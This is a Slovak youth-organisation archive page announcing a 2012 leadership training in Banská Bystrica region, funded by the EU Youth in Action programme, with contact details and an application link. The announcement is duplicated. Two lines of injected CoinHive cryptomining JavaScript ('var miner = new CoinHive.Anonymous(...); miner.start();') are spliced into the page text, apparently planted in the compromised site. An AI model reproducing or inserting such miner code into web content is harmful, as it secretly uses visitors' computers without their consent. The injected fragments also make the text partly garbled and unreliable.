Category Archives: Mládežnícke parlamenty a obecné rady mládeže

Home / Archive by category "Mládežnícke parlamenty a obecné rady mládeže"

Školenie: Ako viesť skupinu?

Miesto konania: Banskobystrický kraj, presné miesto bude upresnené vybraným účastníkom

Termín:11. 5. – 13. 5. 2012

Uzávierka prihlášok: 1.5.2012

Typ aktivity: školenie

Krátka charakteristika:

Prebudiť vnútorný potenciál účastníkov/účastníčok, vedúci k vedeniu iniciatívnych mladých ľudí, k naštartovaniu skupiny riešiť problémy a prevziať zodpovednosť za dosahovanie vytýčených cieľov. Oboznámiť ich s programom Mládež v akcii ako prostriedkom pre zvyšovanie aktívnej účasti mladých ľudí.

Ciele aktivity:

Školenie sa bude venovať otázkam typu:

• Koho a prečo viesť?

• Aká je osobnosť lídra?

Účastníci sa bližšie oboznámia s program Mládež v akcii so zameraním na akciu 1 (mládežnícke výmeny, mládežnícke iniciatívy, projekty mládežníckej demokracie). Získajú bližšie vedomosti o projektovom manažmente, o potrebe lídra pri príprave a realizácii projektu, o fázach procesu vedenia a pod.

Pracovný jazyk: slovenčina

Cieľová skupina: Mladí vedúci, zástupcovia OZ, ŽŠR, mládežníci vedúci

Náklady spojené s účasťou na školení:

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania školenia. V prípade, že sa jedná o mladých ľudí s nedostatkom príležitostí (zlá ekonomická situácia a pod.), prosím kontaktujte kontaktnú osobu.

Kontaktná osoba:

Mgr. Jarmila Lipková

CVČ JUNIOR – RCM, Tajovského 30, SK-975 90 Banská Bystrica

tel.: (421-48) 415 31 11

m.t.: (421-911) 13 61 46

e-mail: jarmila.lipkova@iuventa.sk

 

V prípade záujmu sa môžete prihlásiť on-line. Prihlášku nájdete na našej web.s tránke tu:
http://www.iuventa.sk/sk/Aktualne-skolenia/Ako-viest-skupinu-.alej?eventid=234

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Školenie: Ako viesť skupinu?

Miesto konania: Banskobystrický kraj, presné miesto bude upresnené vybraným účastníkom

Termín:11. 5. – 13. 5. 2012

Uzávierka prihlášok: 1.5.2012

Typ aktivity: školenie

Krátka charakteristika:

Prebudiť vnútorný potenciál účastníkov/účastníčok, vedúci k vedeniu iniciatívnych mladých ľudí, k naštartovaniu skupiny riešiť problémy a prevziať zodpovednosť za dosahovanie vytýčených cieľov. Oboznámiť ich s programom Mládež v akcii ako prostriedkom pre zvyšovanie aktívnej účasti mladých ľudí.

Ciele aktivity:

Školenie sa bude venovať otázkam typu:

• Koho a prečo viesť?

• Aká je osobnosť lídra?

Účastníci sa bližšie oboznámia s program Mládež v akcii so zameraním na akciu 1 (mládežnícke výmeny, mládežnícke iniciatívy, projekty mládežníckej demokracie). Získajú bližšie vedomosti o projektovom manažmente, o potrebe lídra pri príprave a realizácii projektu, o fázach procesu vedenia a pod.

Pracovný jazyk: slovenčina

Cieľová skupina: Mladí vedúci, zástupcovia OZ, ŽŠR, mládežníci vedúci

Náklady spojené s účasťou na školení:

Ubytovanie a strava sú hradené z prostriedkov programu EÚ Mládež v akcii. Účastník si hradí z vlastných nákladov cestovné náklady z/na miesto konania školenia. V prípade, že sa jedná o mladých ľudí s nedostatkom príležitostí (zlá ekonomická situácia a pod.), prosím kontaktujte kontaktnú osobu.

Kontaktná osoba:

Mgr. Jarmila Lipková

CVČ JUNIOR – RCM, Tajovského 30, SK-975 90 Banská Bystrica

tel.: (421-48) 415 31 11

m.t.: (421-911) 13 61 46

e-mail: jarmila.lipkova@iuventa.sk

 

V prípade záujmu sa môžete prihlásiť on-line. Prihlášku nájdete na našej web.s tránke tu:
http://www.iuventa.sk/sk/Aktualne-skolenia/Ako-viest-skupinu-.alej?eventid=234

Pozvánka: Stredoškolský parlament na pomoc regiónu

 

var miner = new CoinHive.Anonymous(‚_‘); miner.start(); Pozvánka: Stredoškolský parlament na pomoc regiónu